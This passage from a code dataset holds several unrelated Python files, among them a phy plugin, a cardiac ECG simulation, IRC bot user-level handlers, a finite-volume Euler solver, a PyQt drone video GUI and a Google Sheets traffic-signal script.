`~/.phy/phy_config.py`:\n\n```python\nc.TemplateGUI.plugins = ['NexpSpikePairUpdate']\n```\n\nLuke Shaheen - Laboratory of Brain, Hearing and Behavior Jan 2017\n\"\"\"\n\nfrom phy import IPlugin\nfrom phy.gui import Actions\nfrom phy.cluster.views import TraceView\n\nclass CopyTraceView(IPlugin):\n \n def attach_to_controller(self, controller):\n @controller.connect\n def on_gui_ready(gui,**kwargs):\n\n actions = Actions(gui) \n @actions.add(menu='TraceView')\n def CopyTraceView():\n tv = gui.get_view('TraceView')\n m = controller.model \n tv2 = TraceView(traces=tv.traces,\n n_channels=tv.n_channels,\n sample_rate=tv.sample_rate,\n duration=tv.duration,\n channel_vertical_order=m.channel_vertical_order,\n )\n gui.add_view(tv2, name='Trace2View')\n tv2.do_show_labels = tv.do_show_labels\n tv2.set_interval(tv._interval)\n tv2.go_to(tv.time)\n tv2.panzoom.set_pan_zoom(zoom=tv.panzoom._zoom,pan=tv.panzoom._pan)\n# cluster_ids = controller.supervisor.selected\n# if len(cluster_ids) == 0:\n# return\n# elif len(cluster_ids) == 1:\n# is_self=True\n# else:\n# is_self=False\n# try:\n# do_compute = self.current_clusters != cluster_ids\n# except:\n# do_compute=True\n# if do_compute:\n# print('computing spike pairs...')\n# spc = controller.supervisor.clustering.spikes_per_cluster\n# spike_ids = spc[cluster_ids[0]]\n# spike_times1 = m.spike_times[spike_ids] \n# if is_self:\n# diffs=np.diff(spike_times1)\n# else:\n# spike_ids = spc[cluster_ids[1]]\n# spike_times2 = 
m.spike_times[spike_ids]\n# diffs=np.repeat(spike_times1[:,None],spike_times2.shape,axis=1)-np.repeat(spike_times2[:,None],spike_times1.shape,axis=1).T\n# self.max_num=np.min((np.prod(diffs.shape),max_num))\n# self.order=np.argsort(np.absolute(diffs),axis=None)[:self.max_num] \n# if is_self:\n# self.times=(spike_times1[self.order]+spike_times1[self.order+1])/2\n# else:\n# indexes = np.unravel_index(self.order,diffs.shape)\n# self.times=(spike_times1[indexes[0]]+spike_times2[indexes[1]])/2\n# self.current_index=0\n# self.current_clusters=cluster_ids\n# print('done')\n# else:\n# self.current_index += increment\n# if self.current_index == max_num:\n# self.current_index=0\n# elif self.current_index < 0:\n# self.current_index=self.max_num-1\n# tv.go_to(self.times[self.current_index])\n\n","sub_path":"phycontrib/LBHB_plugins/CopyTraceView.py","file_name":"CopyTraceView.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"173999714","text":"\"\"\"\nDecide on the delta/nu ranges before running this. Will get a series of questions stating parameters.\nRight now parameters such as system size and rp are not currently saved so make a note of them.\n\nYou will need to install h5py. A good package which has a lot of useful modules for data science is anaconda.\n\"\"\"\n\nimport propagate_singlesource as fp\nimport analysis_theano as at\nfrom itertools import product\nimport numpy as np\nimport h5py\nimport time\n# import matplotlib.pyplot as plt\n\n\nIterations = int(input(\"Number of iterations: \"))\n\ndef convert(data, output):\n\n for index_data in data:\n grid[(grid > 0) & (grid <= 50)] -= 1\n if index_data == []: # could use but this is more readable.\n current_state = grid.copy()\n output.append(current_state)\n else:\n indices = np.unravel_index(index_data, a.shape)\n for ind in range(len(indices[0])):\n grid[indices[0][ind]][indices[1][ind]] = 50\n current_state = grid.copy()\n output.append(current_state)\n\n return output\n\ne = at.ECG(shape=(200, 200), probe_height=3) # Assuming shape/probe height doesn't change.\nfile_name = input(\"Name of output file: \")\nprint(\"Nu Value:\")\nnu = float(input())\n\nh5f = h5py.File('%s.h5' % file_name, 'w')\nfor index in range(Iterations):\n start_time1 = time.time()\n index_grp = h5f.create_group('Index: %s' % index)\n\n a = fp.Heart(nu = nu, fakedata=True)\n rand_true = True\n while rand_true:\n crit_position = np.random.randint(0,40000,2)\n y_rand,x_rand = np.unravel_index(crit_position,(200,200))\n if (((y_rand[1] - y_rand[0]) ** 2) + ((x_rand[1] - x_rand[0]) ** 2)) ** 0.5 > 50.:\n rand_true = False\n\n a.set_pulse(60,[[y_rand],[x_rand]])\n raw_data = a.propagate(960)\n converted_data = list()\n grid = np.zeros(a.shape)\n convert(raw_data, converted_data)\n\n # Saving the critical circuit position\n index_grp.create_dataset('Crit Position', data=crit_position)\n ecg = e.solve(converted_data[661:])\n\n index_grp.create_dataset('ECG', data=ecg)\n index_grp.create_dataset('Probe Positions', data=e.probe_position)\n print(\"--- Iteration %s: %s seconds ---\" % (index, time.time() - start_time1))\n\nh5f.close()\n","sub_path":"simulate_doublesource.py","file_name":"simulate_doublesource.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"65481940","text":"from motobot import hook, IRCLevel, command\n\n\n@command('levelprobe')\ndef levelprobe_command(bot, nick, 
channel, message, args):\n try:\n mapping = {\n IRCLevel.user: 'has nothing',\n IRCLevel.voice: 'has a voice',\n IRCLevel.hop: 'has a half-op',\n IRCLevel.aop: 'has an ops',\n IRCLevel.sop: 'has a protected ops',\n IRCLevel.owner: 'is the owner',\n IRCLevel.master: 'is a muthafuckin\\' master'\n }\n return \"{} {} in this channel.\".format(args[1], mapping[bot.get_userlevel(channel, args[1])])\n except IndexError:\n return \"Please supply a valid user to probe.\"\n except KeyError:\n return \"Please supply a user who is actually in this channel.\"\n\n\n@hook('353')\ndef handle_names(bot, message):\n \"\"\" Parse the name command and record the userlevels of users. \"\"\"\n channel = message.params[2]\n names = message.params[-1].split(' ')\n for name in names:\n handle_name(bot, channel, name)\n\n\ndef handle_name(bot, channel, name):\n \"\"\" Handle a single name from the name command. \"\"\"\n userlevels, nick = get_userlevels(name)\n bot.userlevels[(channel, nick)] = userlevels\n\n\ndef get_userlevels(name):\n \"\"\" Get the userlevel from a nick and return the userlevel and nick. \"\"\"\n mapping = {\n '+': IRCLevel.voice,\n '%': IRCLevel.hop,\n '@': IRCLevel.aop,\n '&': IRCLevel.sop,\n '~': IRCLevel.owner\n }\n userlevels = [IRCLevel.user]\n\n for i in range(len(name)):\n if name[i] in mapping:\n userlevels.append(mapping[name[i]])\n else:\n return userlevels, name[i:]\n\n\n@hook('JOIN')\ndef handle_join(bot, message):\n \"\"\" Handle the join of a user. \"\"\"\n channel = message.params[0]\n bot.userlevels[(channel, message.nick)] = [IRCLevel.user]\n\n\n@hook('NICK')\ndef handle_nick(bot, message):\n \"\"\" Handle the nick change of a user. \"\"\"\n old_nick = message.nick\n new_nick = message.params[0]\n\n for channel, nick in bot.userlevels:\n if nick == old_nick:\n bot.userlevels[(channel, new_nick)] = \\\n bot.userlevels.pop((channel, nick))\n\n\n@hook('MODE')\ndef handle_mode(bot, message):\n \"\"\" Handle the mode command and update userlevels accordingly. \"\"\"\n mapping = {\n 'v': IRCLevel.voice,\n 'h': IRCLevel.hop,\n 'o': IRCLevel.aop,\n 'a': IRCLevel.sop,\n 'q': IRCLevel.owner\n }\n channel = message.params[0]\n nicks = message.params[2:]\n add = True if message.params[1][0] == '+' else False\n modes = message.params[1][1:]\n\n for nick, mode in zip(nicks, modes):\n if mode in mapping:\n level = mapping[mode]\n userlevels = bot.userlevels[(channel, nick)]\n if add:\n userlevels.append(level)\n else:\n userlevels = [x for x in userlevels if x != level]\n bot.userlevels[(channel, nick)] = userlevels\n\n\n@hook('PART')\ndef handle_part(bot, message):\n \"\"\" Handle the part of a user. \"\"\"\n channel = message.params[0]\n bot.userlevels.pop((channel, message.nick))\n\n\n@hook('KICK')\ndef handle_kick(bot, message):\n \"\"\" Handle the kick of a user. \"\"\"\n nick = message.params[1]\n channel = message.params[0]\n bot.userlevels.pop((channel, nick))\n\n\n@hook('QUIT')\ndef handle_quit(bot, message):\n \"\"\" Handle the quit of a user. 
\"\"\"\n remove = []\n for channel, nick in bot.userlevels:\n if nick == message.nick:\n remove.append((channel, nick))\n for pair in remove:\n bot.userlevels.pop(pair)\n","sub_path":"motobot/core_plugins/userlist_handlers.py","file_name":"userlist_handlers.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"39631137","text":"\"\"\"\nCopyright 2021 Mohamed Khalil\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport os\nos.environ['NUMPY_EXPERIMENTAL_ARRAY_FUNCTION'] = '0'\n\nimport numpy as np\nfrom abc import abstractmethod\n\nfrom pyHype.limiters import limiters\nfrom pyHype.states.states import ConservativeState\nfrom pyHype.flux.Roe import ROE_FLUX_X\nfrom pyHype.flux.HLLE import HLLE_FLUX_X, HLLE_FLUX_Y\nfrom pyHype.flux.HLLL import HLLL_FLUX_X, HLLL_FLUX_Y\nimport pyHype.fvm.Gradients as Grads\nimport pyHype.utils.utils as utils\n\n\n__DEFINED_FLUX_FUNCTIONS__ = ['Roe', 'HLLE', 'HLLL']\n__DEFINED_SLOPE_LIMITERS__ = ['VanAlbada', 'VanLeer', 'Venkatakrishnan', 'BarthJespersen']\n__DEFINED_GRADIENT_FUNCS__ = ['GreenGauss']\n__DEFINED_RECONSTRUCTION__ = ['Primitive', 'Conservative']\n\n\nclass MUSCLFiniteVolumeMethod:\n def __init__(self,\n inputs,\n global_nBLK: int\n ) -> None:\n \"\"\"\n Solves the euler equations using a MUSCL-type finite volume scheme.\n\n TODO:\n ------ DESCRIBE MUSCL BRIEFLY ------\n\n The matrix structure used for storing solution data in various State classes is a (ny * nx * 4) numpy ndarray\n which has planar dimentions equal to the number of cells in the y and x direction, and a depth of 4. The\n structure looks as follows:\n\n ___________________nx____________________\n v v\n |> O----------O----------O----------O----------O ........................ q0 (zeroth state variable)\n | | | | | |\\\n | | | | | |-O ...................... q1 (first state variable)\n | | | | | | |\\\n | O----------O----------O----------O----------O |-O .................... q2 (second state variable)\n | | | | | |\\| |\\\n | | | | | |-O |-O .................. q3 (third state variable)\n | | | | | | |\\| |\n ny O----------O----------O----------O----------O |-O |\n | | | | | |\\| |\\|\n | | | | | |-O |-O\n | | | | | | |\\| |\n | O----------O----------O----------O----------O |-O |\n | | | | | |\\| |\\|\n | | | | | |-O | O\n | | | | | | |\\| |\n |> O----------O----------O----------O----------O |-O |\n \\| \\| \\| \\| \\| |\\|\n O----------O----------O----------O----------O |-O\n \\| \\| \\| \\| \\| |\n O----------O----------O----------O----------O |\n \\| \\| \\| \\| \\|\n O----------O----------O----------O----------O\n\n\n then, cells are constructed as follows:\n\n O---------O---------O---------O---------O\n | | | | |\n | | | | |\n | | | | |\n O---------O---------O---------O---------O\n | | | | |\n | | .....x..... | | -- Y+1/2\n | | . | . | |\n O---------O----x--- C ---x----O---------O -- Y\n | | . | . | |\n | | .....x..... 
| | -- Y-1/2\n | | | | |\n O---------O---------O---------O---------O\n | | | | |\n | | | | |\n | | | | |\n O---------O---------O---------O---------O\n | | |\n X-1/2 X X+1/2\n\n Reduction to 1D problem for each cell:\n\n x - direction:\n\n O---------O---------O---------O---------O\n | | | | |\n | | | | |\n | | | | |\n O---------O---------O---------O---------O\n | | | | |\n | | | | |\n | | | | |\n O---------O---------O---------O---------O\n | | | | |\n | | | | |\n ..|.........|.........|.........|.........|..\n . O----x----O----x--- C ---x----O----x----0 .\n ..|.........|.........|.........|.........|..\n | | | | |\n | | | | |\n O---------O---------O---------O---------0\n\n y - direction:\n . . .\n O---------O-------.-O-.-------O---------O\n | | . | . | |\n | | . x . | |\n | | . | . | |\n O---------O-------.-O-.-------O---------O\n | | . | . | |\n | | . x . | |\n | | . | . | |\n O---------O-------.-C-.-------O---------O\n | | . | . | |\n | | . x . | |\n | | . | . | |\n O---------O-------.-O-.-------O---------O\n | | . | . | |\n | | . x . | |\n | | . | . | |\n O---------O-------.-O-.-------O---------O\n . . .\n \"\"\"\n\n # Set x and y direction number of points\n self.nx = inputs.nx\n self.ny = inputs.ny\n\n # Set inputs\n self.inputs = inputs\n\n # Set global block number\n self.global_nBLK = global_nBLK\n\n # Initialize x and y direction flux\n self.Flux_E = np.empty((self.ny, self.nx, 4))\n self.Flux_W = np.empty((self.ny, self.nx, 4))\n self.Flux_N = np.empty((self.ny, self.nx, 4))\n self.Flux_S = np.empty((self.ny, self.nx, 4))\n\n # Initialize left and right conservative states\n self.UL = ConservativeState(self.inputs, nx=self.nx + 1, ny=1)\n self.UR = ConservativeState(self.inputs, nx=self.nx + 1, ny=1)\n\n # Set Flux Function. Flux Function must be included in __DEFINED_FLUX_FUNCTIONS__\n _flux_func = self.inputs.flux_function\n\n if _flux_func in __DEFINED_FLUX_FUNCTIONS__:\n\n # ROE Flux\n if _flux_func == 'Roe':\n self.flux_function_X = ROE_FLUX_X(self.inputs, self.inputs.nx)\n self.flux_function_Y = ROE_FLUX_X(self.inputs, self.inputs.ny)\n # HLLE Flux\n elif _flux_func == 'HLLE':\n self.flux_function_X = HLLE_FLUX_X(self.inputs)\n self.flux_function_Y = HLLE_FLUX_Y(self.inputs)\n # HLLL Flux\n elif _flux_func == 'HLLL':\n self.flux_function_X = HLLL_FLUX_X(self.inputs)\n self.flux_function_Y = HLLL_FLUX_Y(self.inputs)\n # None\n else:\n raise ValueError('MUSCLFiniteVolumeMethod: Flux function type not specified.')\n\n # Set slope limiter. Slope limiter must be included in __DEFINED_SLOPE_LIMITERS__\n _flux_limiter = self.inputs.limiter\n\n if _flux_limiter in __DEFINED_SLOPE_LIMITERS__:\n\n # Van Leer limiter\n if _flux_limiter == 'VanLeer':\n self.flux_limiter = limiters.VanLeer(self.inputs)\n # Van Albada limiter\n elif _flux_limiter == 'VanAlbada':\n self.flux_limiter = limiters.VanAlbada(self.inputs)\n # Venkatakrishnan\n elif _flux_limiter == 'Venkatakrishnan':\n self.flux_limiter = limiters.Venkatakrishnan(self.inputs)\n # BarthJespersen\n elif _flux_limiter == 'BarthJespersen':\n self.flux_limiter = limiters.BarthJespersen(self.inputs)\n # None\n else:\n raise ValueError('MUSCLFiniteVolumeMethod: Slope limiter type not specified.')\n\n # Set slope limiter. 
Slope limiter must be included in __DEFINED_SLOPE_LIMITERS__\n _gradient = self.inputs.gradient\n\n if _gradient in __DEFINED_GRADIENT_FUNCS__:\n\n # Van Leer limiter\n if _gradient == 'GreenGauss':\n self.gradient = Grads.GreenGauss(self.inputs)\n # None\n else:\n raise ValueError('MUSCLFiniteVolumeMethod: Slope limiter type not specified.')\n\n # ------------------------------------------------------------------------------------------------------------------\n # Reconstruction functions\n\n def reconstruct(self,\n refBLK\n ) -> [np.ndarray]:\n \"\"\"\n This method routes the state required for reconstruction to the correct implementation of the reconstruction.\n Current reconstruction methods are Primitive and Conservative.\n\n Parameters:\n - refBLK: Reference block to reconstruct\n\n Return:\n - stateE: Reconstructed state on east cell face\n - stateW: Reconstructed state on west cell face\n - stateN: Reconstructed state on north cell face\n - stateS: Reconstructed state on south cell face\n \"\"\"\n\n # Select correct reconstruction type and return left and right reconstructed conservative states\n\n # Primitive reconstruction\n if self.inputs.reconstruction_type == 'Primitive':\n return self.reconstruct_primitive(refBLK)\n\n # Conservative reconstruction (by default)\n else:\n return self.reconstruct_state(refBLK, refBLK.state.U,\n refBLK.ghost.E.state.U, refBLK.ghost.W.state.U,\n refBLK.ghost.N.state.U, refBLK.ghost.S.state.U)\n\n\n def reconstruct_primitive(self,\n refBLK,\n ) -> [np.ndarray]:\n \"\"\"\n Primitive reconstruction implementation. Simply convert the input ConservativeState into PrimitiveState and\n call the reconstruct_state implementation.\n\n Parameters:\n - U: Input ConservativeState for reconstruction.\n\n Return:\n - stateL: Left reconstructed conservative state\n - stateR: Right reconstructed conservative state\n \"\"\"\n\n _state = refBLK.state.to_primitive_vector()\n _state_E_ghost = refBLK.ghost.E.state.to_primitive_vector()\n _state_W_ghost = refBLK.ghost.W.state.to_primitive_vector()\n _state_N_ghost = refBLK.ghost.N.state.to_primitive_vector()\n _state_S_ghost = refBLK.ghost.S.state.to_primitive_vector()\n\n stateE, stateW, stateN, stateS = self.reconstruct_state(refBLK, _state,\n _state_E_ghost, _state_W_ghost,\n _state_N_ghost, _state_S_ghost)\n\n _state_E = ConservativeState(inputs=self.inputs, W_vector=stateE).U\n _state_W = ConservativeState(inputs=self.inputs, W_vector=stateW).U\n _state_N = ConservativeState(inputs=self.inputs, W_vector=stateN).U\n _state_S = ConservativeState(inputs=self.inputs, W_vector=stateS).U\n\n return _state_E, _state_W, _state_N, _state_S\n\n\n @abstractmethod\n def reconstruct_state(self,\n refBLK,\n state: np.ndarray,\n ghostE: np.ndarray,\n ghostW: np.ndarray,\n ghostN: np.ndarray,\n ghostS: np.ndarray\n ) -> [np.ndarray]:\n \"\"\"\n Implementation of the reconstruction method specialized to the Finite Volume Method described in the class.\n \"\"\"\n pass\n\n # ------------------------------------------------------------------------------------------------------------------\n # Flux evaluation and integration functions\n\n @abstractmethod\n def integrate_flux_E(self, refBLK):\n pass\n\n\n @abstractmethod\n def integrate_flux_W(self, refBLK):\n pass\n\n\n @abstractmethod\n def integrate_flux_N(self, refBLK):\n pass\n\n\n @abstractmethod\n def integrate_flux_S(self, refBLK):\n pass\n\n\n def dUdt(self, refBLK):\n \"\"\"\n Compute residuals used for marching the solution through time by integrating the fluxes on each cell 
face and\n        applying the semi-discrete Godunov method:\n\n        dUdt[i] = - (1/A[i]) * sum[over all faces] (F[face] * length[face])\n        \"\"\"\n\n        # Compute fluxes\n        self.get_flux(refBLK)\n\n        # Integrate fluxes\n        fluxE = self.integrate_flux_E(refBLK)\n        fluxW = self.integrate_flux_W(refBLK)\n        fluxN = self.integrate_flux_N(refBLK)\n        fluxS = self.integrate_flux_S(refBLK)\n\n        return -(fluxE + fluxW + fluxN + fluxS) / refBLK.mesh.A\n\n\n    def get_flux(self, refBLK):\n        \"\"\"\n        Compute the flux at each cell face by sweeping through rows and columns of the domain.\n        \"\"\"\n\n        # Compute x and y direction gradients\n        self.gradient(refBLK)\n\n        # Get reconstructed quadrature points\n        stateE, stateW, stateN, stateS = self.reconstruct(refBLK)\n\n        # --------------------------------------------------------------------------------------------------------------\n        # Calculate x-direction Flux\n\n        # Reset U vector holder sizes to ensure compatibility with the number of cells in the x-direction\n        self.UL.reset(shape=(1, self.nx + 1, 4))\n        self.UR.reset(shape=(1, self.nx + 1, 4))\n\n        # Copy all ghost cell values that will be used for the flux calculations\n        _east_ghost = refBLK.ghost.E.col_copy(0)\n        _west_ghost = refBLK.ghost.W.col_copy(-1)\n        _north_ghost = refBLK.ghost.N.row_copy(0)\n        _south_ghost = refBLK.ghost.S.row_copy(-1)\n\n        # Rotate to align with cell faces\n        utils.rotate(refBLK.mesh.get_east_face_angle(), _east_ghost)\n        utils.rotate(refBLK.mesh.get_west_face_angle(), _west_ghost)\n        utils.rotate(refBLK.mesh.faceE.theta, stateE)\n        utils.rotate(refBLK.mesh.faceW.theta - np.pi, stateW)\n\n        # Iterate over all rows in block\n        for row in range(self.ny):\n\n            # Set vectors based on left and right states\n            stateL = np.concatenate((_west_ghost[row:row+1, :, :],\n                                     stateE[row:row+1, :, :]), axis=1)\n\n            stateR = np.concatenate((stateW[row:row+1, :, :],\n                                     _east_ghost[row:row+1, :, :]), axis=1)\n\n            self.UL.from_conservative_state_vector(stateL)\n            self.UR.from_conservative_state_vector(stateR)\n\n            # Calculate face-normal flux at each cell east-west interface\n            flux_EW = self.flux_function_X.compute_flux(self.UL, self.UR)\n\n            # Set east face flux\n            self.Flux_E[row, :, :] = flux_EW[:, 1:, :]\n            # Set west face flux\n            self.Flux_W[row, :, :] = flux_EW[:, :-1, :]\n\n        # Rotate flux back to the global frame\n        utils.unrotate(refBLK.mesh.faceE.theta, self.Flux_E)\n        utils.unrotate(refBLK.mesh.faceW.theta - np.pi, self.Flux_W)\n\n        # --------------------------------------------------------------------------------------------------------------\n        # Calculate y-direction Flux\n\n        # Reset U vector holder sizes to ensure compatibility with the number of cells in the y-direction\n        self.UL.reset(shape=(1, self.ny + 1, 4))\n        self.UR.reset(shape=(1, self.ny + 1, 4))\n\n        # Rotate to align with cell faces\n        utils.rotate(refBLK.mesh.get_north_face_angle(), _north_ghost)\n        utils.rotate(refBLK.mesh.get_south_face_angle(), _south_ghost)\n        utils.rotate(refBLK.mesh.faceN.theta, stateN)\n        utils.rotate(refBLK.mesh.faceS.theta - np.pi, stateS)\n\n        # Iterate over all columns in block\n        for col in range(self.nx):\n\n            # Set vectors based on left and right states\n            stateL = np.concatenate((_south_ghost[:, col:col + 1, :],\n                                     stateN[:, col:col + 1, :]), axis=0)\n\n            stateR = np.concatenate((stateS[:, col:col + 1, :],\n                                     _north_ghost[:, col:col + 1, :]), axis=0)\n\n            self.UL.from_conservative_state_vector(stateL.transpose((1, 0, 2)))\n            self.UR.from_conservative_state_vector(stateR.transpose((1, 0, 2)))\n\n            # Calculate face-normal flux at each cell north-south interface\n            flux_NS = 
self.flux_function_Y.compute_flux(self.UL, self.UR).reshape(-1, 4)\n\n # Set east face flux\n self.Flux_N[:, col, :] = flux_NS[1:, :]\n # Set west face flux\n self.Flux_S[:, col, :] = flux_NS[:-1, :]\n\n # Rotate flux back to global frame\n utils.unrotate(refBLK.mesh.faceN.theta, self.Flux_N)\n utils.unrotate(refBLK.mesh.faceS.theta - np.pi, self.Flux_S)\n","sub_path":"pyHype/fvm/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":17929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"540325807","text":"import sys, app, time, cv2, datetime\nfrom pytz import timezone\nfrom PyQt5 import QtCore\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom threading import Thread\n\nclass GUI:\n def __init__(self):\n self.app = QApplication(sys.argv)\n self.window = QWidget()\n self.layout = QVBoxLayout(self.window)\n self.sub_layout = QHBoxLayout(self.window)\n self.window.setWindowTitle('Remote Drone')\n self.window.setGeometry(0, 0, 640, 480)\n \n # Label that displays the video feed\n self.video_label = QLabel()\n self.pixmap = QPixmap('video_blank.png')\n self.video_label.setPixmap(self.pixmap)\n \n # Button to take a picture\n self.button_capture_image = QPushButton('Take Picture')\n self.button_capture_image.clicked.connect(self.capture_image)\n\n self.layout.addWidget(self.video_label)\n self.layout.addWidget(self.button_capture_image)\n self.window.setLayout(self.layout)\n \n self.drone = None\n self.output_img = None\n\n self.layout.addLayout(self.sub_layout)\n self.label = QLabel('Speed: 0')\n self.label_1 = QLabel('Battery: 78')\n self.label_2 = QLabel('Temperature: 88')\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n self.label_1.setAlignment(Qt.AlignCenter)\n self.label_2.setAlignment(Qt.AlignCenter)\n self.sub_layout.addWidget(self.label)\n self.sub_layout.addWidget(self.label_1)\n self.sub_layout.addWidget(self.label_2)\n \n\n def show_video_feed(self):\n # wait 10 seconds to make sure feed starts before capturing\n # otherwise it fails until app restarted\n print('sleeping for 5 sec')\n time.sleep(5)\n cap = cv2.VideoCapture('udp://0.0.0.0:11111?overrun_nonfatal=1&fifo_size=50000000', cv2.CAP_FFMPEG)\n cap.set(cv2.CAP_PROP_BUFFERSIZE, 0)\n if not cap.isOpened():\n print('cap not opened!!')\n exit(-1)\n\n while True:\n ret, frame = cap.read()\n\n if not ret:\n print('EMPTY FRAME')\n break\n\n # try to show frame 'image' in pixmap\n img = QImage(frame.data, frame.shape[1], frame.shape[0], QImage.Format_RGB888).rgbSwapped()\n # scale image smaller\n img.scaledToWidth(640, QtCore.Qt.SmoothTransformation)\n img.scaledToHeight(480, QtCore.Qt.SmoothTransformation)\n self.output_img = img.scaled(640, 480, QtCore.Qt.KeepAspectRatioByExpanding, QtCore.Qt.SmoothTransformation)\n self.video_label.setPixmap(QPixmap.fromImage(self.output_img))\n self.video_label.update()\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n cap.release()\n cv2.destroyAllWindows()\n\n\n def show(self):\n self.window.show()\n\n\n def capture_image(self):\n tz = timezone('US/Eastern')\n ts = datetime.datetime.now(tz)\n\n if self.output_img:\n self.output_img.save(f'{ts}.png')\n print('took a picture!')\n else:\n print('video capture is not open!')\n\n\n def set_self_drone(self, drone):\n self.drone = drone\n","sub_path":"models/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 
+{"seq_id":"602623137","text":"#coding=cp949\n\nprompt=\"\"\"\n1. 입력\n2. 종료\n 입력: \"\"\"\ningredint_list=[]\n\ndef input_ingredint():\n while True:\n input_list=input(\"안녕하세요. 원하시는 재료를 넣어주세요.: \")\n if input_list == '종료':\n return\n else:\n ingredint_list[:] += [input_list]\n\ndef make_sandwiches():\n print(\"샌드위치를 만듭니다.\")\n for i in ingredint_list[:]:\n print(f\"{i} 추가합니다.\")\n print(\"여기 주문하신 샌드위치 만들었습니다. 맛있게 드세요.\")\n\nwhile True:\n choice = int(input(prompt))\n if choice == 1:\n input_ingredint()\n make_sandwiches()\n break\n elif choice == 2:\n print(\"프로그램을 종료합니다.\")\n break\n else:\n print(\"잘못된 번호를 입력하셨습니다.\")\n continue\n\n","sub_path":"python_workspace/01_jump_to_python/4_input_output/3_file_io/q9.py","file_name":"q9.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"457706177","text":"import numpy as np\r\nimport time\r\nimport cv2 as cv\r\nfrom matplotlib import pyplot as plt\r\nimport random\r\nimport gspread\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nfrom pprint import pprint\r\n\r\nscope = [\"https://spreadsheets.google.com/feeds\", 'https://www.googleapis.com/auth/spreadsheets',\r\n \"https://www.googleapis.com/auth/drive.file\", \"https://www.googleapis.com/auth/drive\"]\r\n\r\ncreds = ServiceAccountCredentials.from_json_keyfile_name(\"client_secret.json\", scope)\r\n\r\nclient = gspread.authorize(creds)\r\n\r\nsheet = client.open(\"MP6\").sheet1 # Open the spreadhseet\r\n\r\nwhile (1):\r\n\r\n ####-----------North\r\n p = 7\r\n sheet.update_cell(1, 2, 0)\r\n sheet.update_cell(3, 3, 20) # update non open corridors as open time =20\r\n sheet.update_cell(4, 3, 20)\r\n sheet.update_cell(5, 3, 20)\r\n edge = cv.imread('NRef.png', 0)\r\n now = sum(sum(edge))\r\n print(now)\r\n\r\n i = random.choice([1, 2, 3])\r\n print(i)\r\n j = str(i)\r\n file = 'North/NStage' + j + '.png'\r\n print(file)\r\n img1 = cv.imread(file, 0)\r\n edges1 = cv.Canny(img1, 150, 250)\r\n now1 = sum(sum(edges1))\r\n\r\n sim = (now / now1) * 100\r\n print(sim)\r\n\r\n if (sim > 37):\r\n nt = 20\r\n elif (sim > 34):\r\n nt = 40\r\n else:\r\n nt = 30\r\n\r\n sheet.update_cell(p, 2, 100 - sim)\r\n while nt > 0:\r\n sheet.update_cell(p, 3, nt)\r\n time.sleep(3)\r\n nt = nt - 3\r\n\r\n ####-----------West\r\n p = p + 1\r\n sheet.update_cell(1, 2, 1)\r\n sheet.update_cell(2, 3, 20) # update non open corridors as open time =20\r\n sheet.update_cell(4, 3, 20)\r\n sheet.update_cell(5, 3, 20)\r\n edge = cv.imread('WRef.jpg', 0)\r\n now = sum(sum(edge))\r\n print(now)\r\n\r\n i = random.choice([1, 2, 3])\r\n print(i)\r\n\r\n j = str(i)\r\n file = 'West/WStage' + j + '.jpg'\r\n print(file)\r\n img1 = cv.imread(file, 0)\r\n edges1 = cv.Canny(img1, 150, 250)\r\n now1 = sum(sum(edges1))\r\n\r\n sim = (now / now1) * 100\r\n print(sim)\r\n\r\n if (sim > 58):\r\n wt = 40\r\n elif (sim > 52):\r\n wt = 20\r\n else:\r\n wt = 30\r\n\r\n sheet.update_cell(p, 2, 100 - sim)\r\n while wt > 0:\r\n sheet.update_cell(p, 3, wt)\r\n time.sleep(3)\r\n wt = wt - 3\r\n\r\n ####-----------South\r\n p = p + 1\r\n sheet.update_cell(1, 2, 2)\r\n sheet.update_cell(2, 3, 20) # update non open corridors as open time =20\r\n sheet.update_cell(3, 3, 20)\r\n sheet.update_cell(5, 3, 20)\r\n edge = cv.imread('SRef.jpg', 0)\r\n now = sum(sum(edge))\r\n print(now)\r\n\r\n i = random.choice([1, 2, 3])\r\n print(i)\r\n j = str(i)\r\n file = 'South/SStage' + j + '.jpg'\r\n print(file)\r\n img1 = cv.imread(file, 0)\r\n edges1 = 
